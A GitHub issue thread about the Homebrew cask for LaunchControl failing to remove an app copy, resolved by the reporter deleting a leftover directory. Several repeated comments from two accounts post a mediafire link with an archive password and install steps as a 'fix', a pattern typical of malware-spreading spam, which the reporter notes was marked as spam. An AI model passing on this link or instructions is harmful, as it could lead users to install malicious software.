### ISSUE TITLE
launchcontrol does not uninstall

### ISSUE THREAD

**Issue by CaptainComeback** [Homebrew/homebrew-cask#183927]
### Verification

- [X] I understand that [if I ignore these instructions, my issue may be closed without review](https://github.com/Homebrew/homebrew-cask/blob/master/doc/faq/closing_issues_without_review.md).
- [X] I have retried my command with `--force`.
- [X] I ran `brew update-reset && brew update` and retried my command.
- [X] I ran `brew doctor`, fixed as many issues as possible and retried my command.
- [X] I have checked the instructions for [reporting bugs](https://github.com/Homebrew/homebrew-cask#reporting-bugs).
- [X] I made doubly sure this is not a [checksum does not match / SHA256 mismatch](https://docs.brew.sh/Common-Issues#cask---checksum-does-not-match) error (do not open an issue before trying to open a PR to fix first).

### Description of issue

brew install --cask launchcontrol

brew remove --cask launchcontrol
brew remove only removes the application from the launchpad the application can still be ran by right clicking on a plist and selecting launch control.

### Command that failed

brew remove --cask launchcontrol

### Output of command with `--verbose --debug`

```shell
brew remove --cask launchcontrol
==> Uninstalling Cask launchcontrol
==> Removing launchctl service com.soma-zone.LaunchControl.Helper
Password:
==> Removing files:
/Library/PrivilegedHelperTools/com.soma-zone.LaunchControl.Helper
==> Backing App 'LaunchControl.app' up to '/usr/local/Caskroom/launchcontrol/2.6
==> Removing App '/Applications/LaunchControl.app'
==> Unlinking Binary '/usr/local/bin/fdautil'
==> Purging files for version 2.6.3 of Cask launchcontrol
```

### Output of `brew doctor` and `brew config`

```shell
brew doctor                     
Your system is ready to brew.

brew config
HOMEBREW_VERSION: 4.3.18
ORIGIN: https://github.com/Homebrew/brew
HEAD: abc0584215659c5a8716d0798ea2801388d01368
Last commit: 5 days ago
Core tap JSON: 31 Aug 05:43 UTC
Core cask tap JSON: 31 Aug 05:51 UTC
HOMEBREW_PREFIX: /usr/local
HOMEBREW_CASK_OPTS: []
HOMEBREW_MAKE_JOBS: 12
Homebrew Ruby: 3.3.4 => /usr/local/Homebrew/Library/Homebrew/vendor/portable-ruby/3.3.4_1/bin/ruby
CPU: dodeca-core 64-bit kabylake
Clang: 15.0.0 build 1500
Git: 2.46.0 => /usr/local/bin/git
Curl: 8.7.1 => /usr/bin/curl
macOS: 14.6.1-x86_64
CLT: 15.3.0.0.1.1708646388
Xcode: 15.4
```

### Output of `brew tap`

```shell
brew tap   
homebrew/services
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by CaptainComeback** [comment]
I see the comment was marked as spam. Well I found the solution. The install puts a directory inside my home directory called app with launch control inside. I deleted the directory and all is good.
